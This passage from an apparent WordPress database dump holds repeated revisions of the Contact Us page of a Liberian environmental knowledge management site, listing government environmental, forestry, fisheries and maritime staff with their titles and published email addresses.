href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:29:17','2021-02-25 15:29:17','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3516,42,'2021-02-25 15:29:17','2021-02-25 15:29:17','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:29:17','2021-02-25 15:29:17','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3517,42,'2021-02-25 15:29:17','2021-02-25 15:29:17','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen 